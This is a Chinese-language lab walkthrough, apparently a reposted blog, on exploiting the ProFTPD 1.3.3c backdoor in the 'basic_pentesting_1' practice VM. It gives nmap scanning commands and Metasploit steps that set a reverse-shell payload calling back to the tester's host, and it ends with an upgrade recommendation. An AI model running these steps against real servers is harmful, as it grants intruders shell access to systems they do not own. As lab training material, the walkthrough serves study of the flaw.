FTP服务后门实战

影响范围

ProFTPD 1.3.3c

漏洞介绍

ProFTPD是一种高度可定制和可扩展的FTP服务器软件,它提供了一种安全和可靠的方式来传输文件和数据,它支持多种操作系统,包括类Unix系统(例如:Linux、FreeBSD等)和Windows,在其1.3.3c软件包中存在一处命令执行的后门漏洞,攻击者可以直接进行命令执行获取服务器端的Shell权限

漏洞利用

这里以"basic_pentesting_1"靶机中的ProFTPD 1.3.3c版本为例进行漏洞的检测与利用,首先执行以下命令来获取目标主机的IP地址信息

nmap -sn 192.168.204.0/24

服务端口扫描:

nmap -A -T4 -v 192.168.204.144

从上面的扫描结果可以看到目标服务器开启了21、22、80端口,而且注意到目标服务器中的FTP服务版本为ProFTPD 1.3.3c,所以我们可以直接利用该服务对应的漏洞对目标服务器实施攻击操作,首先我们使用searchsploit进行漏洞的检索操作

searchsploit ProFTOD 1.3.3c

随后我们直接在MSF中检索漏洞利用模块

msfconsole
search ProFTOD 1.3.3c

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.204.144
RHOSTS => 192.168.204.144
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.204.135
lhost => 192.168.204.135
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options

随后执行载荷并成功获取到目标服务器的权限

修复建议

升级到FTPD的最新版本

参考连接

https://www.cnvd.org.cn/flaw/show/CNVD-2010-3023

猜你喜欢

转载自blog.csdn.net/Fly_hps/article/details/135012101